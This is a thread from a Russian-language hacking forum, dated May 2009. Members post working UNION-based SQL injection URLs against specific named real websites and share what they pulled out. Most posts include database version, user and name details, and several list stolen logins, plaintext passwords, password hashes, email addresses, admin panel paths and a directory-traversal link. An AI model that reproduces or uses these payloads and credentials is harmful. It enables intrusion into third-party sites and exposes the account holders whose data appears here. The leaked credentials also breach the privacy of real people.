09.05.2009, 17:37
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме:
810079
Репутация:
90
|
|
http://www.derechoshumanos.org.mx/modules.php?name=News&file=article&sid=-301+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14
Вот только скобки фильтруются...
|
|
|
09.05.2009, 18:24
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме:
810079
Репутация:
90
|
|
Target: metrocasas.com.mx
Evil link: http://metrocasas.com.mx/cliente/paginas/news.php?page=2&id_news=-60+union+select+1,2,3,4
Database info (user:version:database):
visiondig@localhost:4.1.21-standard-log:visiondig_metro
Users:
http://metrocasas.com.mx/cliente/paginas/news.php?page=2&id_news=-60+union+select+1,group_concat(login,0x3a,password ),3,4+from+users
|
|
|
|
09.05.2009, 19:05
|
|
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме:
1385078
Репутация:
126
|
|
http://www.islam.com.mx/quiz_output.php?quiz_id=2%27/**/union/**/select+1,password,username,4,5,6,7,8,9+from+user/*
login: smontiel
pass: 445339 (за пасс благодарю поисковую систему гугл)
Последний раз редактировалось jokester; 09.05.2009 в 19:13..
Причина: шеллы запрещены
|
|
|
|
09.05.2009, 19:30
|
|
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме:
1385078
Репутация:
126
|
|
http://cambiodeluces.arts-history.mx/entrada.php?id=-254+UNION+SELECT+concat_ws(0x3a,version(),user(),d atabase()),2,3,4,5,6,7,8--
Database Version: 5.0.45-log
Database name: neoartes
User name: neoartes@localhost
[QUOTE]Getting Data from table blog_users from database neoartes
Fields username:email  assword
[0]:adminblogs:soporte@arts-history.mx:
[1]:mzavala:mzavala@arts-history.mx:85870bafb753ce276bfdb55c5e5630e3:Nr4HLK PIcVkaFMWpZMzeMd2LbknTKZ
Getting Data from table phpSP_users from database neoartes
Fields user assword
[0]:mzavala@arts-history.mx:
[1] ostafoto@prodigy.net.mx:ranita
[2]:correo@arts-history.mx:HNEJBQ
[3]:redaccion:noticias2008
Getting Data from table sre_sp_users from database neoartes
Fields user assword
[0]:admin:admin
[1]:usuario:usuario |
|
|
|
09.05.2009, 20:17
|
|
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582
Репутация:
394
|
|
http://www.kvbpr.com {PR 3}
Код:
http://www.kvbpr.com/news.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5--
5.0.67-community : kvbpr_kvbpr08 : kvbpr_idesign@localhost
table users:
Код:
http://www.kvbpr.com/news.php?id=-1+union+select+1,group_concat(name,0x3a,pass),3,4,5+from+users--
|
|
|
|
09.05.2009, 21:53
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638
Репутация:
256
|
|
Код:
http://www.technolex-anwaelte.de/index.php?id=43&news_id=1+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
php-info:
Код:
http://www.technolex-anwaelte.de/info.php
админка:
Код:
http://www.technolex-anwaelte.de/admin/
Просмотр дир:
Код:
http://www.technolex-anwaelte.de/admin/index_upload.php?dir=../
Пароли к админке:
1:technolex:technolex!
2:14v:14v |
|
|
|
09.05.2009, 23:53
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973
Репутация:
466
|
|
http://kiteonline.net/pages/news_detail.php?id=-34+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11
Database Version: 5.0.67-community
Database name: kiteonli_dbkite
User name: kiteonli_kitesit@localhost
In database kiteonli_dbkite found table adminusers
1 : firstname
2 : lastname
3 : email
4 : username
5 : password
6 : approval
7 : tbDate
8 : userid
|
|
|
|
10.05.2009, 00:07
|
|
Участник форума
Регистрация: 22.05.2008
Сообщений: 158
Провел на форуме:
2875309
Репутация:
348
|
|
Код:
http://www.stadiya.ru/news/?id=-434+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9--
stadiya_@imarket1.2x4.ru:stadiya_:4.1.22-log
тИЦ: 100
PR:4 |
|
|
|
10.05.2009, 00:48
|
|
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
Провел на форуме:
785842
Репутация:
239
|
|
http://www.sim.misto.zp.ua/show.php?id=-746+union+sele ct+concat(u ser(),0x0B,database(),0x0B,version())+--+
mistozpu_misto@localhost
mistozpu_smile
5.0.67-community-log
http://www.sim.misto.zp.ua/show.php?id=-746+union+select+concat(TABLE_NAME,0x0B,COLUMN _NAME)+from+information_schema.columns+lim it+179,10+--+
table: admin
columns: password
вот только немогу ниче с табл админ взять, не пойму че это, если у кого получется стянуть с админа свисните в личку, пасиб |
|
|
|
10.05.2009, 01:16
|
|
Новичок
Регистрация: 08.12.2007
Сообщений: 21
Провел на форуме:
347718
Репутация:
36
|
|
_http://www.mango-mango.ru/news/index.php?page=single&rec=21
_http://www.mango-mango.ru/news/index.php?page=single&rec=21+order+by+7+--+
_http://www.mango-mango.ru/news/index.php?page=single&rec=-21+union+select+1,2,3,4,5,6,7+--+
_http://www.mango-mango.ru/news/index.php?page=single&rec=-21+union+select+1,version(),database(),4,user(),6, 7+--+
version - 4.1.22-sta
database - mangoman_base
user - mangoman_user@localhost
Таблицы:
customers
articles
news
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
